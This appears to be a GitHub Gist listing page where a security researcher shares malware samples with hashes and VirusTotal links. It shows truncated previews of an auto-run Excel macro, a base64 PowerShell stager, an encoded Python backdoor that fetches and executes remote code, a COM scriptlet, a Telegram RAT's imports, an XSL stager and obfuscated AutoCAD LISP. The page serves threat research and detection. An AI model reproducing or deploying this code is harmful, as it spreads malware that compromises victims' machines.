John Lambert JohnLaTwC
JohnLaTwC
/ 6719e80361950cdb10c4a4fcccc389c2a26eaab761c202870353fe65e8f954a3
Created
August 21, 2018 15:36
VBA + PS1 threat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Hash: 6719e80361950cdb10c4a4fcccc389c2a26eaab761c202870353fe65e8f954a3 | |
| ## VT Link: https://www.virustotal.com/#/file/6719e80361950cdb10c4a4fcccc389c2a26eaab761c202870353fe65e8f954a3/detection | |
| ## VBA: | |
| Private Sub WorkBook_Open() | |
| Call VVVV | |
| Application.Wait (Now + TimeValue("0:00:10")) | |
| Call AAAA |
JohnLaTwC
/ PS1 threat
Created
August 23, 2018 16:44
2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Hash: 2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132 | |
| ## VT Link: https://www.virustotal.com/#/file/2a27d7ad1f16c90767e1cf98c92905aa5a3030a268c8206462c5215a87d0e132/detection | |
| ## Original file | |
| $YHRIul = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("MTYyLjI0NC4zMi4xNDg=")) | |
| [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
| $gxPVX = [System.Convert]::FromBase64String("H4sIAAAAAAACC+1Ye2wcRxn/9r17ti9Zn3t3cXq+S/PoNW6ujp02rZSCE9u0TuLYiZ3EdmiT9d3G3uS8e9lbu3GBKIhQUaGmtVBKW1KrPFRVgAoIJAIFiao8WqCIBhCISihUolSqACEeQiAIv5nd8yM2rdQ/+AfWvm++13zP2Zm56xt9hCQikvG5epXoEoVPJ739cxafePbrcfqK8fK6S8Lel9cNTTjVXMX3xn1rMle0XNcLcmN2zp9yc46b6+4fzE16JbvQ0BDbENkY6CHaK0j0929Vj9TsXiFxXZ2gEzWBUEPeXAdArhZYZ4iLYdxECyMPSgxRiTo/TLSa/y+M80PoH3b3RCYfE1dI8hhRPb2DB/Hpi0gd9N2L6EJgnw4wfiYR5dW0EPciE8cKftUvUhRbZ5Rocqke2J0F3y57xSjWY5Gt5mV6u5b1sCMc7+ZTFHojTzQRIxLonT2JNpleJz7fzCPWmKcAxPIqQzUGUJVY6qE6qCRkU05mtzxpyp4BZl0VfmP1ehWyWIOhNT+Rr2cTGgAMbe0S6vrFVD |
JohnLaTwC
/ 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22
Created
August 25, 2018 16:41
Python backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded @JohnLaTwC | |
| ## Hash: 9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22 | |
| ## VT Link: https://www.virustotal.com/#/file/9f1bbfb7690b3af03f6d5f61325a327e0aee704f0418f88ccfb0973e94174e22/detection | |
| var1 = '''aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm''' | |
| import re | |
| # Matches everything between two texts, returns the first match, Returns: str or False | |
| var2 = '''8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xOTIuMTY4LjQyLjI0MDo0NDMvTjdBOFJaNnRnLVlYSndJelRLWkJGd2o1S0JxZDJmYTQtdWt |
JohnLaTwC
/ cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e
Created
August 30, 2018 15:51
VBS COM Scriptlet threat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Hash: cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e | |
| ## VTLink: https://www.virustotal.com/#/file/cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e/detection | |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="Pentest" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > |
JohnLaTwC
/ a6d3865be64c8f0caf649447f68cf9769e3e6a10843bca0b4576e3a33a4d1ad4
Created
September 4, 2018 12:44
Python RAT (https://github.com/mvrozanti/RAT-via-Telegram)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| import logging | |
| from PIL import ImageGrab # /capture_pc | |
| from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv | |
| from sys import argv, path, stdout # console output | |
| from json import loads # reading json from ipinfo.io | |
| from winshell import startup # persistence | |
| from tendo import singleton # this makes the application exit if there's another instance already running | |
| from win32com.client import Dispatch # WScript.Shell |
JohnLaTwC
/ 172c90e7d9814d066134fe6779f704cc542d7126f7c6ed0ce8c3cd3632fd7d2d
Created
September 18, 2018 13:20
XSL stager - Sharp shooter
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <xsl:stylesheet version="1.0" | |
| xmlns:xsl="http://www.w3.org/1999/XSL/Transform" | |
| xmlns:msxsl="urn:schemas-microsoft-com:xslt" | |
| xmlns:sharp="http://sharp.shooter/mynamespace"> | |
| <msxsl:script language="JScript" implements-prefix="sharp"> | |
| function shooter(nodelist) { | |
| <![CDATA[ | |
| function setversion() { |
JohnLaTwC
/ 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003
Created
September 19, 2018 15:19
VBA XLS Threat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OpX:MAS-H--- 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003 | |
| =============================================================================== | |
| FILE: 4ae63b5cd1f0503d1d858e2f12de51c5218d4ccddef1beae0d1c7962b1783003 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisWorkbook.cls | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook' |
JohnLaTwC
/ 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55
Created
September 21, 2018 19:46
Visio Test Malicious VBA
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OpX:M-S-H--- 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55 | |
| =============================================================================== | |
| FILE: 9a97b33b4f48f134e6b1524d1bae90982d2bb56f4ceb01cecbf9cc8827263d55 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: visio/vbaProject.bin - OLE stream: 'VBA/ThisDocument' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## AutoCAD LISP Malware | |
| ################################################################### | |
| ## 332ca1146b1478cc9ddda9be07815a48071b9e83081eb995f33379385d3258f2 | |
| (setq s::startup nil) | |
| (setq *startup* (strcat (chr 40) | |
| (chr 115) | |
| (chr 101) | |
| (chr 116) |
JohnLaTwC
/ 80610bb3a5be887e9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2
Created
September 23, 2018 16:56
Pentest VBA VBS sample
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Sample Hash: 80610bb3a5be887e9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2 | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OpX:M-S-HB-- 9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2 | |
| =============================================================================== | |
| FILE: 9eaa7f6883725b24c358862b39b52c4766634554f02bc9d2 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- |